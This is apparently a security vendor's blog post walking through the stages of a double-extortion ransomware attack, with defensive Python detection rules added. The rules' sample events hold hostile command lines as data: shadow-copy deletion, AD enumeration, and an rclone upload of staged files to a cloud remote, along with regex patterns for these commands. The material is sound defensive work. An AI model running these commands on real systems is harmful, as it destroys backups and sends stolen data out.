TL;DR: Modern enterprise ransomware attacks take two to eight weeks from initial access to encryption. Understanding the complete attack chain — and where detection and interruption are possible at each stage — is the foundation of a defensible security posture. Encryption is the last step, not the first.
Why the Playbook Matters More Than the Malware
When a ransomware incident makes headlines, coverage focuses on the encrypted files, the ransom demand, and the business disruption. Rarely discussed are the weeks of methodical activity that preceded the encryption event. Understanding the complete playbook is essential because it reveals that ransomware is not a single event to be blocked — it is a multi-stage campaign with multiple detection and interruption opportunities that most organizations are not configured to use.
Double extortion ransomware — the model used by virtually every major enterprise-targeting ransomware group since 2019 — adds a second extortion lever to traditional encryption. Before encrypting systems, attackers exfiltrate sensitive data to attacker-controlled infrastructure. The ransom demand then combines two threats: pay to receive the decryption key, and pay separately (or in combination) to prevent the publication of stolen data on a leak site. Organizations with functional backups can restore encrypted data but cannot un-exfiltrate the stolen records already in attacker possession. This is why backup availability alone does not resolve a modern ransomware incident.
Stage 1: Initial Access
The attack begins with gaining an initial foothold. The three most common vectors in enterprise ransomware incidents are: exploitation of internet-facing vulnerabilities (unpatched VPN appliances, public-facing web applications, Exchange servers), purchasing access from an Initial Access Broker who has already established persistence, and phishing — either for credential harvesting or for direct payload delivery via malicious document or link.
The initial foothold is often a relatively low-privilege position: a compromised employee account with VPN access, a webshell on a DMZ server, or a phishing-delivered loader executing on a standard workstation. The sophistication of the initial access step is often lower than organizations expect. The subsequent stages are where the real operational expertise is applied.
Detection opportunity: Authentication anomalies (login from new geolocation or device, off-hours VPN connections, credential stuffing patterns), web application firewall alerts on exploitation attempts, email security alerts on malicious attachments.
Stage 2: Persistence and C2 Establishment
Within hours of the initial foothold, attackers implant a command-and-control (C2) beacon. Historically, Cobalt Strike was the dominant post-exploitation framework used in ransomware operations; law enforcement actions and increased detection have led to diversification into Sliver, Brute Ratel C4, and custom loaders. The C2 beacon provides the attacker with a persistent, interactive channel into the compromised environment that survives password resets and system reboots.
The beacon is configured to communicate with attacker-controlled infrastructure, typically over HTTPS to blend with legitimate web traffic. Beaconing intervals are configured to avoid anomaly detection — a beacon checking in every four hours generates less alert noise than one operating every 30 seconds. The attacker may remain dormant for days or weeks after establishing the C2, particularly if access was purchased from an IAB and the buyer is conducting due diligence on the target environment.
Detection opportunity: Behavioral EDR detecting unusual process injections, network monitoring for beaconing patterns (regular outbound connections to newly registered or unusual domains), DNS monitoring for queries to recently created domains or domains with unusual characteristics.
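The beaconing-pattern check mentioned above can be expressed as a simple statistic: for each source host and destination, how regular are the gaps between outbound connections? The following is an added example, not code from the original article or from Lorikeet Security. It builds a constructed set of connection records (the hostnames, the `.example` destinations, the times and the four-hour interval are all invented) and flags (source, destination) pairs with many connections and a low coefficient of variation in their inter-connection gaps. Real beacons add jitter, so the threshold is a tuning parameter rather than a fixed truth.

```python
"""Beacon-interval heuristic over constructed outbound connection records.

A beacon that checks in on a schedule produces near-constant gaps between
connections to the same destination. For each (source host, destination)
pair, compute the mean gap, its coefficient of variation (std / mean) and
the number of connections; pairs with many connections and low jitter are
candidates for analyst review. Normal browsing is bursty and does not pass.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def build_sample():
    """Constructed records: (timestamp, source host, destination, port).
    Hosts, domains and times are invented for this example."""
    records = []
    base = datetime(2024, 3, 4, 1, 0, 0)
    # A beacon from ws-17 checking in every 4 hours, with a few seconds of jitter, for 2 days.
    jitter_seconds = [0, 7, -4, 3, -6, 2, 5, -2, 1, -3, 4, -1]
    for i, j in enumerate(jitter_seconds):
        records.append((base + timedelta(hours=4 * i, seconds=j),
                        "ws-17", "beacon-constructed.example", 443))
    # Ordinary browsing from ws-17 at irregular times during the day.
    for h in (9, 9.2, 9.9, 11, 13.5, 16, 17.1):
        records.append((base + timedelta(hours=h), "ws-17", "www.example.com", 443))
    # ws-22 reaching a mail service a handful of times, irregularly.
    for h in (8, 8.1, 12, 15.7):
        records.append((base + timedelta(hours=h), "ws-22", "mail.example.com", 443))
    return records


def beacon_candidates(records, min_connections=8, max_cv=0.05):
    """Return {(src, dst): (count, mean_gap_seconds, cv)} for pairs whose
    connection gaps are regular enough to look like scheduled check-ins.

    min_connections keeps short-lived pairs out; max_cv is the allowed
    jitter as a fraction of the mean gap (0.05 = 5%). Both are tuning knobs.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, _port in records:
        by_pair[(src, dst)].append(ts)

    findings = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings[pair] = (len(stamps), round(avg), round(cv, 4))
    return findings


if __name__ == "__main__":
    for (src, dst), (count, gap, cv) in beacon_candidates(build_sample()).items():
        print(f"{src} -> {dst}: {count} connections, mean gap {gap}s, cv {cv}")
```

In production the same computation runs over proxy or NetFlow records bucketed per day, and the destination side is enriched with domain age and popularity so that a regular check-in to a well-known update service can be suppressed while one to a newly registered domain is escalated.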
Stages 3–5: Discovery, Lateral Movement, and Privilege Escalation
With a stable C2 channel established, the attacker begins systematic internal reconnaissance. This typically involves Active Directory enumeration (identifying domain controllers, privileged groups, service accounts), network share scanning (identifying file servers and data repositories containing high-value data), and backup system discovery (locating backup infrastructure for later destruction). Tools used are often native Windows utilities (net.exe, nltest.exe, dsquery) or BloodHound for AD path analysis — Living Off the Land techniques that blend with administrative activity.
Lateral movement uses harvested credentials, Pass-the-Hash with captured NTLM hashes, or Pass-the-Ticket with captured Kerberos tickets. Remote service execution via WMI, WinRM, or SMB propagates the C2 beacon to additional systems. The attacker systematically moves toward high-value targets: domain controllers, backup servers, and systems containing the data to be exfiltrated.
Privilege escalation targets domain admin, enterprise admin, or equivalent cloud administration roles. Common techniques include exploiting misconfigured AD Certificate Services (ESC1, ESC8 attack paths), Kerberoasting (cracking service account password hashes offline), and abusing over-permissioned ACLs identified through BloodHound. With domain admin privileges, no further technical obstacles exist to the final stages.
Detection opportunity: Unusual authentication events (NTLM authentication where Kerberos is expected, service accounts authenticating interactively, off-hours domain admin logins), lateral movement indicators in process creation logs, AD enumeration patterns in event logs.
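The three authentication anomalies listed above map directly onto fields of the Windows 4624 (successful logon) event. The following is an added example, not code from the original article or from Lorikeet Security: it encodes each anomaly as a rule over constructed 4624-style records. The domain name `CORP`, the `svc_` service-account prefix, the privileged account names and the working-hours window are assumptions standing in for an organization's own conventions.

```python
"""Authentication-anomaly rules over constructed Windows 4624 (successful
logon) events: NTLM where Kerberos is expected, service accounts logging on
interactively, and privileged accounts authenticating outside working hours.
Field names are those of the 4624 event; the accounts, hosts, times and
naming conventions are invented for this example."""
from datetime import datetime

DOMAIN = "CORP"                         # assumed AD domain NetBIOS name
PRIVILEGED = {"da_admin", "ent_admin"}  # assumed: known Tier-0 accounts
SERVICE_PREFIX = "svc_"                 # assumed: service-account naming convention
WORK_HOURS = range(7, 19)               # 07:00-18:59 treated as working hours
INTERACTIVE = {2, 10}                   # logon types: 2 Interactive, 10 RemoteInteractive


def logon(time, user, domain, logon_type, package, host):
    return {"TimeCreated": time, "TargetUserName": user, "TargetDomainName": domain,
            "LogonType": logon_type, "AuthenticationPackageName": package,
            "WorkstationName": host}


EVENTS = [
    # Routine: domain user, Kerberos network logon, during the day
    logon("2024-03-05T10:12:00", "jdoe", "CORP", 3, "Kerberos", "WS-17"),
    # Domain user reaching a file server over NTLM: Kerberos would be expected
    logon("2024-03-05T10:40:00", "jdoe", "CORP", 3, "NTLM", "WS-17"),
    # Machine-account NTLM is common and is excluded by the rule
    logon("2024-03-05T10:41:00", "WS-17$", "CORP", 3, "NTLM", "WS-17"),
    # Service account used for an RDP session (type 10)
    logon("2024-03-05T11:05:00", "svc_backup", "CORP", 10, "Kerberos", "BKP-01"),
    # Same service account doing its normal service logon (type 5): fine
    logon("2024-03-05T11:06:00", "svc_backup", "CORP", 5, "Kerberos", "BKP-01"),
    # Domain admin logging on to a domain controller at 02:30
    logon("2024-03-06T02:30:00", "da_admin", "CORP", 10, "Kerberos", "DC-01"),
    # Local account on a standalone kiosk: NTLM is expected there
    logon("2024-03-06T03:00:00", "localadmin", "KIOSK-3", 2, "NTLM", "KIOSK-3"),
]


def ntlm_where_kerberos_expected(ev):
    """Domain user account authenticating with NTLM. Machine accounts and local
    accounts are excluded. NTLM to an IP address or to a host without an SPN is
    a known benign cause, so hits are triage items rather than verdicts."""
    return (ev["TargetDomainName"] == DOMAIN
            and ev["AuthenticationPackageName"] == "NTLM"
            and not ev["TargetUserName"].endswith("$"))


def service_account_interactive(ev):
    """Service accounts should log on as services (type 5) or over the network
    (type 3); an interactive or RDP logon means a human is using the account."""
    return (ev["TargetUserName"].startswith(SERVICE_PREFIX)
            and ev["LogonType"] in INTERACTIVE)


def privileged_off_hours(ev):
    hour = datetime.fromisoformat(ev["TimeCreated"]).hour
    return ev["TargetUserName"] in PRIVILEGED and hour not in WORK_HOURS


RULES = (ntlm_where_kerberos_expected, service_account_interactive, privileged_off_hours)


def evaluate(events):
    """Return (rule name, account, time) for every rule that fires on each event."""
    return [(rule.__name__, ev["TargetUserName"], ev["TimeCreated"])
            for ev in events for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for name, user, when in evaluate(EVENTS):
        print(f"{when}  {name:32} {user}")
```

Each rule is deliberately narrow so that it can be tuned on its own: the NTLM rule in particular needs an allow-list of hosts that legitimately fall back to NTLM before it is useful as an alert rather than a hunt query.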
Stage 6: Data Exfiltration — The Double Extortion Component
Before any encryption occurs, the attacker conducts a systematic data exfiltration operation. The goal is to identify and steal the data that carries the highest extortion value: financial records, customer PII, health records, intellectual property, legal documents, M&A materials. Data is typically staged on an internal system, compressed, and transmitted to attacker-controlled infrastructure — often using cloud storage services (Mega, Rclone to S3, or custom SFTP servers) to blend with legitimate traffic.
Exfiltration volumes in enterprise incidents can range from hundreds of gigabytes to multiple terabytes. The transfer occurs over days, throttled to avoid triggering data loss prevention rules or bandwidth anomaly alerts. By the time encryption is deployed, the exfiltration is complete. The stolen data is the negotiation leverage that makes backup-based recovery insufficient.
Detection opportunity: DLP alerts on bulk file staging or compression of sensitive data, network monitoring for large outbound transfers to cloud storage or unusual destinations, endpoint detection for Rclone or similar tools executing with remote storage arguments.
Stages 7–8: Defense Degradation and Encryption
Immediately before deploying the encryptor, attackers systematically degrade defensive capabilities to prevent interruption and maximize encryption coverage. This includes disabling or uninstalling AV and EDR software (often exploiting admin privileges to stop services or tamper with agent configurations), deleting Volume Shadow Copies (the primary Windows backup mechanism) using vssadmin.exe or wmic shadowcopy delete, clearing Windows event logs to complicate forensic recovery, and disabling System Restore points.
The encryptor is then deployed across the environment — typically via a domain-wide Group Policy Object modification, a domain admin PowerShell script, or the C2 framework's built-in deployment capabilities. Encryption targets network shares, database files, and document repositories. Systems are encrypted in a prioritized order designed to maximize business impact before any manual intervention can occur.
Detection opportunity: EDR alerts on VSS deletion, event log clearing (Event IDs 1102 and 104), service modifications to AV/EDR processes, mass file renaming or modification events characteristic of encryption activity.
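Several of the detection opportunities across Stages 3 to 8 come down to process command lines and log-management events: the AD-enumeration burst from Stages 3–5 (net.exe, nltest.exe, dsquery), the compression and Rclone staging from Stage 6, and the shadow-copy deletion and log clearing from Stages 7–8. The following is an added example, not code from the original article or from Lorikeet Security, that runs rules for all of these over constructed 4688-style process-creation records and 1102/104 log-clear records. Every host, user, path and Rclone remote name is invented; the tool names and command forms are the ones the article itself names.

```python
"""Detection rules for later-stage activity over constructed Windows events:
process creation (4688-style fields) and log-clear events (1102 for the
Security log, 104 for other logs). Covers an AD-enumeration burst, archive
and Rclone staging, shadow-copy deletion and log clearing. All hosts, users,
paths and remote names are invented for this example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta


def proc(time, host, user, image, cmdline):
    return {"EventID": 4688, "TimeCreated": time, "Computer": host,
            "SubjectUserName": user, "NewProcessName": image, "CommandLine": cmdline}


def log_clear(time, host, user, event_id):
    return {"EventID": event_id, "TimeCreated": time, "Computer": host, "SubjectUserName": user}


EVENTS = [
    # Discovery burst on one workstation, minutes apart
    proc("2024-03-06T09:01:00", "WS-17", "jdoe", r"C:\Windows\System32\net.exe", 'net group "Domain Admins" /domain'),
    proc("2024-03-06T09:02:00", "WS-17", "jdoe", r"C:\Windows\System32\nltest.exe", "nltest /dclist:corp"),
    proc("2024-03-06T09:04:00", "WS-17", "jdoe", r"C:\Windows\System32\dsquery.exe", "dsquery computer -limit 0"),
    # A lone 'net use' on another host is routine and must not fire
    proc("2024-03-06T09:05:00", "WS-22", "asmith", r"C:\Windows\System32\net.exe", r"net use Z: \\fs-01\share"),
    # Staging: archive a data tree, then push it to a cloud remote with rclone
    proc("2024-03-08T22:10:00", "FS-01", "da_admin", r"C:\Tools\7z.exe", r"7z.exe a -mx1 D:\staging\hr.7z E:\HR\Records"),
    proc("2024-03-08T22:40:00", "FS-01", "da_admin", r"C:\Tools\rclone.exe", r"rclone.exe copy D:\staging mega:dump --transfers 8"),
    # Rclone between two local paths carries no remote and is not flagged
    proc("2024-03-08T22:41:00", "FS-01", "da_admin", r"C:\Tools\rclone.exe", r"rclone.exe copy D:\staging F:\archive"),
    # Defense degradation on a domain controller, then log clearing
    proc("2024-03-09T01:15:00", "DC-01", "da_admin", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    proc("2024-03-09T01:15:30", "DC-01", "da_admin", r"C:\Windows\System32\wbem\WMIC.exe", "wmic shadowcopy delete"),
    proc("2024-03-09T01:16:00", "DC-01", "da_admin", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe list shadows"),
    log_clear("2024-03-09T01:20:00", "DC-01", "da_admin", 1102),
    log_clear("2024-03-09T01:20:05", "DC-01", "da_admin", 104),
]

DISCOVERY_IMAGES = {"net.exe", "net1.exe", "nltest.exe", "dsquery.exe"}
SHADOW_DELETE = re.compile(r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)
ARCHIVER = re.compile(r"^(7z|7za|rar|winrar)(\.exe)?\s+a\b", re.I)   # 'a' = add-to-archive command
DRIVE_PATH = re.compile(r"^[A-Za-z]:[\\/]")


def image_name(ev):
    return ev["NewProcessName"].rsplit("\\", 1)[-1].lower()


def rclone_remote_args(ev):
    """Tokens of an rclone command line shaped like 'remote:path', i.e. containing
    a colon but not a drive letter path and not an option flag."""
    if image_name(ev) != "rclone.exe":
        return []
    return [t for t in ev["CommandLine"].split()[1:]
            if ":" in t and not DRIVE_PATH.match(t) and not t.startswith("-")]


def evaluate(events):
    """Return (finding, host, time) tuples sorted by time."""
    findings = []
    bursts = defaultdict(list)   # (host, user) -> [(time, discovery image)]
    for ev in events:
        if ev["EventID"] != 4688:
            if ev["EventID"] in (1102, 104):
                findings.append(("event_log_cleared", ev["Computer"], ev["TimeCreated"]))
            continue
        ts = datetime.fromisoformat(ev["TimeCreated"])
        cmd = ev["CommandLine"]
        if image_name(ev) in DISCOVERY_IMAGES:
            bursts[(ev["Computer"], ev["SubjectUserName"])].append((ts, image_name(ev)))
        if SHADOW_DELETE.search(cmd):
            findings.append(("shadow_copy_deletion", ev["Computer"], ev["TimeCreated"]))
        if ARCHIVER.match(cmd):
            findings.append(("bulk_compression_staging", ev["Computer"], ev["TimeCreated"]))
        remotes = rclone_remote_args(ev)
        if remotes:
            findings.append(("rclone_to_remote:" + ",".join(remotes), ev["Computer"], ev["TimeCreated"]))
    # Discovery: 3+ distinct enumeration binaries by one user on one host within 10 minutes
    for (host, _user), seen in bursts.items():
        seen.sort()
        for i, (start, _img) in enumerate(seen):
            window = {img for ts, img in seen[i:] if ts - start <= timedelta(minutes=10)}
            if len(window) >= 3:
                findings.append(("ad_enumeration_burst", host, start.isoformat()))
                break
    return sorted(findings, key=lambda f: f[2])


if __name__ == "__main__":
    for name, host, when in evaluate(EVENTS):
        print(f"{when}  {host:6} {name}")
```

The shadow-copy and log-clear rules are high-confidence on their own; the enumeration burst and the archiver rule are noisier and are best used to raise the priority of a host that already has a beacon or authentication finding, which is the correlation the Stages 3–5 text refers to.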
| Attack Stage | Typical Duration | Key Detection Method | Interruption Effectiveness |
|---|---|---|---|
| Initial Access | Hours | Auth anomalies, WAF, email security | High — prevents all subsequent stages |
| C2 Establishment | Hours to days | Behavioral EDR, network/DNS monitoring | High — removes attacker control channel |
| Internal Discovery | Days to 1 week | AD enumeration detection, SIEM correlation | High — attacker has not yet escalated privileges |
| Lateral Movement | Days to 2 weeks | Unusual authentication patterns, process creation | Moderate — contain spread, isolate affected systems |
| Privilege Escalation | Hours to days | Privileged account anomalies, AD change monitoring | Moderate — domain compromise not yet complete |
| Data Exfiltration | Days to 1 week | DLP, network monitoring, Rclone detection | Low for recovery — exfiltration cannot be reversed |
| Defense Degradation | Hours | VSS deletion alerts, EDR tamper detection | Low — encryption is imminent |
| Encryption and Ransom | Minutes to hours | File system monitoring, honeypot files | Minimal — damage is largely complete |
The business continuity framing: The question a board should be asking is not "do we have backups?" It is "how long after initial access would we detect an attacker conducting reconnaissance in our environment?" If the honest answer is "we would not detect it until encryption," the organization is operating without meaningful ransomware defense regardless of backup quality.
Lorikeet Security's red team engagements and incident response planning services are designed to answer exactly this question for your organization — not in theory, but through controlled testing of your real detection infrastructure. Book a consultation to discuss your current ransomware detection and response capability.
Test Your Ransomware Detection Coverage Before Attackers Do
Lorikeet Security's red team engagements simulate the complete ransomware attack chain — from initial access through lateral movement and data exfiltration — to measure your detection and response capability at each stage.